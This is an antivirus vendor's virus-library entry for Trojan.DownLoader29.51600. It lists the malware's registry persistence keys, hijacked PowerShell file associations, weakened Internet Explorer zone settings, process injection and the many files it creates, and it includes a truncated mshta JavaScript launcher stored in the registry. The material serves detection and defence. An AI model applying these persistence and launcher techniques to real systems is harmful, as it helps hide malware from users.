PER UTENTI

Chiudi

La mia libreria
La mia libreria

+ Aggiungi alla libreria

Ricerca
Ricerca

Supporto
Supporto 24/7 | Regole per contattare

Scrivi

Una richiesta attraverso il modulo

Chiama

+7 (495) 789-45-86

Forum

Richieste

Crea nuova richiesta

Chiama

+7 (495) 789-45-86

Profile

IT

RU CN DE EN ES FR IT JP KZ UZ PL BY
Chiudi
Servizi
Scanner
Dr.Web vxCube
Versione di prova
Perizia di incidenti informatici legati ai virus
Libreria dei virus
Base di conoscenza

Tecnologie

Termini

Formazione ed informazione

Falsi miti

Notizie

Trojan.DownLoader29.51600

Aggiunto al database dei virus Dr.Web: 2019-07-29

La descrizione è stata aggiunta:

Technical Information

To ensure autorun and distribution
Modifies the following registry keys
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'ielbrbq' = '"<LS_APPDATA>\ysecer\ysecer.exe"'
  • [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'ielbrbq' = '"<LS_APPDATA>\ysecer\ysecer.exe"'
  • [<HKLM>\Software\Classes\Microsoft.PowerShellScript.1\shell\Open\command] '' = '"<SYSTEM32>\notepad.exe" "%1" '
  • [<HKLM>\Software\Classes\Microsoft.PowerShellData.1\shell\Open\command] '' = '"<SYSTEM32>\notepad.exe" "%1" '
  • [<HKLM>\Software\Classes\Microsoft.PowerShellModule.1\shell\Open\command] '' = '"<SYSTEM32>\notepad.exe" "%1" '
  • [<HKLM>\Software\Classes\Microsoft.PowerShellConsole.1\shell\open\command] '' = '"<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe" -p "%1" '
  • [<HKCU>\SOFTWARE\Classes\8aa5e52\shell\open\command] '' = '"<SYSTEM32>\mshta.exe" "javascript:qzL2RJ="8Jl";M4U=new ActiveXObject("WScript.Shell");mmIyw4x="w";By1Ds=M4U.RegRead("HKCU\\software\\...
  • [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'trkfxr' = '"<LS_APPDATA>\f4593d9\114bff7.bat"'
Creates the following services
  • [<HKLM>\SYSTEM\CurrentControlSet\Services\WinRM] 'ImagePath' = '<SYSTEM32>\svchost.exe -k WinRM'
  • [<HKLM>\SYSTEM\CurrentControlSet\Services\WinRM\Parameters] 'ServiceDll' = '<SYSTEM32>\WsmSvc.dll'
  • [<HKLM>\SYSTEM\CurrentControlSet\Services\SENS] 'Start' = '00000002'
Malicious functions
Injects code into
the following system processes:
  • <SYSTEM32>\regsvr32.exe
Modifies settings of Windows Internet Explorer
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1206' = '00000000'
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '2300' = '00000000'
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1809' = '00000003'
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '1206' = '00000000'
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '2300' = '00000000'
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '1809' = '00000003'
Modifies file system
Creates the following files
  • <LS_APPDATA>\ysecer\ysecer.exe
  • <SYSTEM32>\windowspowershell\v1.0\set66.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set65.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set64.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set63.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set62.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set61.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set60.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set5f.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set5e.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set5d.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set5c.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set5a.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set68.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set59.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set58.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set57.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set56.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set55.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set54.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set53.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set52.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set51.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set50.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set5b.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set3f.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set69.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set82.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set81.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set80.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set7f.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set7e.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set7d.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set7c.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set7b.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set7a.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set79.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set78.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set4f.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set67.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set75.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set74.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set73.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set72.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set71.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set70.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set6f.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set6e.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set6d.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set6c.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set6b.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set76.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set6a.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set4e.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set4d.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set4c.tmp
  • <SYSTEM32>\set23.tmp
  • <SYSTEM32>\set2e.tmp
  • <SYSTEM32>\set2d.tmp
  • <SYSTEM32>\set2c.tmp
  • <SYSTEM32>\set2b.tmp
  • <SYSTEM32>\set2a.tmp
  • <SYSTEM32>\set29.tmp
  • <SYSTEM32>\set28.tmp
  • <SYSTEM32>\set27.tmp
  • <SYSTEM32>\set26.tmp
  • <SYSTEM32>\set25.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set83.tmp
  • <SYSTEM32>\set30.tmp
  • <SYSTEM32>\set22.tmp
  • <SYSTEM32>\set21.tmp
  • <SYSTEM32>\set20.tmp
  • <SYSTEM32>\set1f.tmp
  • <SYSTEM32>\set1e.tmp
  • <SYSTEM32>\wbem\set1d.tmp
  • <SYSTEM32>\winrm\0409\set1c.tmp
  • <SYSTEM32>\grouppolicy\adm\set1b.tmp
  • <SYSTEM32>\grouppolicy\adm\set1a.tmp
  • <SYSTEM32>\grouppolicy\adm\set19.tmp
  • %WINDIR%\inf\set18.tmp
  • <SYSTEM32>\set24.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set77.tmp
  • %WINDIR%\inf\set31.tmp
  • <SYSTEM32>\grouppolicy\adm\set34.tmp
  • %WINDIR%\inf\set32.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set4b.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set4a.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set49.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set48.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set47.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set46.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set45.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set44.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set43.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set42.tmp
  • <SYSTEM32>\grouppolicy\adm\set33.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set41.tmp
  • <SYSTEM32>\set2f.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set3e.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set3d.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set3c.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set3b.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set3a.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set39.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set38.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set37.tmp
  • <SYSTEM32>\winrm\0409\set36.tmp
  • <SYSTEM32>\grouppolicy\adm\set35.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set40.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set84.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set85.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set86.tmp
  • %WINDIR%\assembly\tmp\7u3emv3b\microsoft.powershell.commands.diagnostics.dll
  • %WINDIR%\assembly\tmp\zbks19hq\microsoft.powershell.security.dll
  • %WINDIR%\assembly\tmp\knv3ahpw\microsoft.powershell.commands.utility.dll
  • %WINDIR%\assembly\tmp\hemw7fpy\microsoft.powershell.commands.management.dll
  • %WINDIR%\assembly\tmp\0nw5dmu2\microsoft.powershell.consolehost.dll
  • %WINDIR%\assembly\tmp\0env3bip\system.management.automation.dll
  • %TEMP%\tmpce.tmp
  • <SYSTEM32>\config\windows .evt
  • <SYSTEM32>\config\microsof.evt
  • <SYSTEM32>\windowspowershell\v1.0\setcd.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setcc.tmp
  • %WINDIR%\assembly\tmp\ygvnukwr\microsoft.wsman.runtime.dll
  • <SYSTEM32>\windowspowershell\v1.0\setcb.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setc9.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setc8.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setc7.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setc6.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setc5.tmp
  • %WINDIR%\help\setc4.tmp
  • <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\en\setc3.tmp
  • <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\en\setc2.tmp
  • <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\setc1.tmp
  • <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\setc0.tmp
  • <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\setbf.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setca.tmp
  • %WINDIR%\assembly\tmp\ev5bdc82\microsoft.powershell.editor.resources.dll
  • %WINDIR%\inf\set17.tmp
  • %WINDIR%\assembly\tmp\tkt08fnu\system.management.automation.resources.dll
  • %WINDIR%\security\database\kb968930.sdb
  • %WINDIR%\security\logs\update.log
  • %WINDIR%\security\edb.chk
  • %WINDIR%\security\tmp.edb
  • %WINDIR%\security\edb.log
  • %WINDIR%\security\res1.log
  • %WINDIR%\security\res2.log
  • %WINDIR%\security\edbtmp.log
  • %WINDIR%\seccf.tmp
  • %ALLUSERSPROFILE%\start menu\programs\accessories\windows powershell\windows powershell ise.lnk
  • %ALLUSERSPROFILE%\start menu\programs\accessories\windows powershell\windows powershell.lnk
  • <SYSTEM32>\setbe.tmp
  • %WINDIR%\assembly\tmp\r09gox4c\microsoft.powershell.gpowershell.resources.dll
  • %WINDIR%\assembly\tmp\61tos7z7\microsoft.powershell.graphicalhost.resources.dll
  • %WINDIR%\assembly\tmp\ft2air08\microsoft.powershell.gpowershell.dll
  • %WINDIR%\assembly\tmp\o4egd5tc\microsoft.powershell.editor.dll
  • %WINDIR%\assembly\tmp\g8x5keog\microsoft.powershell.graphicalhost.dll
  • %WINDIR%\assembly\tmp\mftsclj7\microsoft.backgroundintelligenttransfer.management.resources.dll
  • %WINDIR%\assembly\tmp\5wajs09h\microsoft.wsman.management.resources.dll
  • %WINDIR%\assembly\tmp\vx0f7f6g\microsoft.powershell.commands.diagnostics.resources.dll
  • %WINDIR%\assembly\tmp\b5dmt19h\microsoft.powershell.security.resources.dll
  • %WINDIR%\assembly\tmp\7py7fox6\microsoft.powershell.commands.utility.resources.dll
  • %WINDIR%\assembly\tmp\5sijzwde\microsoft.powershell.commands.management.resources.dll
  • %WINDIR%\assembly\tmp\ef65g6bz\microsoft.powershell.consolehost.resources.dll
  • %WINDIR%\assembly\tmp\oj4iswtl\microsoft.wsman.management.dll
  • <SYSTEM32>\windowspowershell\v1.0\setae.tmp
  • %WINDIR%\$968930uinstall_kb968930$\setbd.tmp
  • <SYSTEM32>\windowspowershell\v1.0\seta1.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set9e.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set9d.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set9c.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set9b.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set9a.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set99.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set98.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set97.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set96.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set95.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set94.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set9f.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set93.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set91.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set90.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set8f.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set8e.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set8d.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set8c.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set8b.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set8a.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set89.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set88.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set87.tmp
  • <SYSTEM32>\windowspowershell\v1.0\set92.tmp
  • <LS_APPDATA>\f4593d9\4f579de.ec20e3a2
  • <SYSTEM32>\windowspowershell\v1.0\examples\setbb.tmp
  • <SYSTEM32>\windowspowershell\v1.0\seta2.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setba.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setb9.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setb8.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setb7.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setb6.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setb5.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setb4.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setb3.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setb2.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setb1.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setb0.tmp
  • %WINDIR%\$968930uinstall_kb968930$\setbc.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setaf.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setad.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setac.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setab.tmp
  • <SYSTEM32>\windowspowershell\v1.0\setaa.tmp
  • <SYSTEM32>\windowspowershell\v1.0\seta9.tmp
  • <SYSTEM32>\windowspowershell\v1.0\seta8.tmp
  • <SYSTEM32>\windowspowershell\v1.0\seta7.tmp
  • <SYSTEM32>\windowspowershell\v1.0\seta6.tmp
  • <SYSTEM32>\windowspowershell\v1.0\seta5.tmp
  • <SYSTEM32>\windowspowershell\v1.0\seta4.tmp
  • <SYSTEM32>\windowspowershell\v1.0\seta3.tmp
  • <SYSTEM32>\windowspowershell\v1.0\seta0.tmp
  • %WINDIR%\assembly\tmp\657njz0n\microsoft.backgroundintelligenttransfer.management.dll
  • <SYSTEM32>\set16.tmp
  • <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\oem0.cat
  • D:\f6aa1af8feadf402f6eb6457618ba2\types.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\registry.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\powershelltrace.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\powershellcore.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\help.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\getevent.types.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\filesystem.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\dotnettypes.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\diagnostics.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\certificate.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\bitstransfer.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\powershell.exe.mui
  • D:\f6aa1af8feadf402f6eb6457618ba2\bitstransfer.psd1
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmauto.mof
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrmprov.mof
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrm.ini
  • D:\f6aa1af8feadf402f6eb6457618ba2\wtrinstaller.ico
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmprovhost.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmanhttpconfig.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrshost.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrs.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\spupdsvc.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\spuninst.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\profile.ps1
  • D:\f6aa1af8feadf402f6eb6457618ba2\spmsg.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\importallmodules.psd1
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_functions.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_format.ps1xml.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_foreach.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_for.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_execution_policies.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_eventlogs.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_escape_characters.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_environment_variables.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_do.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_debuggers.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_data_sections.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\pssetupnativeutils.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsman.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_comparison_operators.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_commonparameters.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_comment_based_help.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_command_syntax.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_command_precedence.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_break.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_bits_cmdlets.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_automatic_variables.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_assignment_operators.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_arrays.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_arithmetic_operators.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_continue.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_aliases.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\pscustomsetuputil.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\powershell_ise.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\powershell.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\compiledcomposition.microsoft.powershell.gpowershell.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.consolehost.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.consolehost.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.utility.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.utility.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.management.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.management.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.diagnostics.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.diagnostics.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.backgroundintelligenttransfer.management.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.backgroundintelligenttransfer.management.interop.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_functions_advanced.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.editor.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrm.cmd
  • D:\f6aa1af8feadf402f6eb6457618ba2\windowspowershellhelp.chm
  • D:\f6aa1af8feadf402f6eb6457618ba2\windowsremoteshell.adm
  • D:\f6aa1af8feadf402f6eb6457618ba2\windowsremotemanagement.adm
  • D:\f6aa1af8feadf402f6eb6457618ba2\eventforwarding.adm
  • %TEMP%\windowsxp-kb968930-x86-eng.exe
  • %HOMEPATH%\local settings\<INETFILES>\content.ie5\z9pmdpek\windowsxp-kb968930-x86-eng[1].exe
  • %HOMEPATH%\local settings\<INETFILES>\content.ie5\z9pmdpek\bing[1].htm
  • %HOMEPATH%\cookies\user@www.bing[1].txt
  • %HOMEPATH%\cookies\user@bing[2].txt
  • %HOMEPATH%\cookies\user@yahoo[1].txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.backgroundintelligenttransfer.management.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_core_commands.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.gpowershell.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.graphicalhost.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.gpowershell.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmwmipl.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmsvc.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmres.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmplpxy.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmauto.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrssrv.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrsmgr.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrscmd.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrmprov.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\wevtfwd.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.graphicalhost.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\system.management.automation.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.editor.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\pwrshsip.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\pwrshplugin.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\pwrshmsg.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\pspluginwkr.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\powershell_ise.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.wsman.runtime.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.wsman.management.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.wsman.management.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.security.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.security.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\system.management.automation.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_functions_advanced_methods.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_functions_advanced_parameters.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_functions_cmdletbindingattribute.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\update.ver
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\eula.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\update.inf
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\update.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\updspapi.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\spcustom.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\kb968930xp.cat
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmtxt.xsl
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmpty.xsl
  • D:\f6aa1af8feadf402f6eb6457618ba2\system.management.automation.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.wsman.management.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\$shtdwn$.req
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.security.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.utility.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.management.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.diagnostics.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.backgroundintelligenttransfer.management.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrm.vbs
  • D:\f6aa1af8feadf402f6eb6457618ba2\default.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_ws-management_cmdlets.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_wmi_cmdlets.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_windows_powershell_ise.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_windows_powershell_2.0.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_wildcards.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.consolehost.dll-help.xml
  • <SYSTEM32>\set7.tmp
  • <SYSTEM32>\set15.tmp
  • %WINDIR%\inf\oem0.inf
  • <SYSTEM32>\set13.tmp
  • <SYSTEM32>\set12.tmp
  • <SYSTEM32>\set11.tmp
  • <SYSTEM32>\set10.tmp
  • <SYSTEM32>\setf.tmp
  • <SYSTEM32>\sete.tmp
  • <SYSTEM32>\setd.tmp
  • <SYSTEM32>\setc.tmp
  • <SYSTEM32>\setb.tmp
  • <SYSTEM32>\seta.tmp
  • <SYSTEM32>\set9.tmp
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_while.help.txt
  • <SYSTEM32>\set8.tmp
  • <SYSTEM32>\set6.tmp
  • <SYSTEM32>\set5.tmp
  • <SYSTEM32>\set4.tmp
  • <SYSTEM32>\wbem\set3.tmp
  • <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\kb968930xp.cat
  • %WINDIR%\kb968930xp.cat
  • %WINDIR%\$968930uinstall_kb968930$\spuninst\spuninst.exe
  • %WINDIR%\$968930uinstall_kb968930$\spuninst\updspapi.dll
  • %WINDIR%\$968930uinstall_kb968930$\spuninst\spuninst.inf
  • %WINDIR%\$968930uinstall_kb968930$\spuninst\spuninst.txt
  • %WINDIR%\inf\oem0.pnf
  • %WINDIR%\kb968930.log
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_scopes.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_variables.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_quoting_rules.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_pssession_details.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_providers.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_properties.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_prompts.help.txt
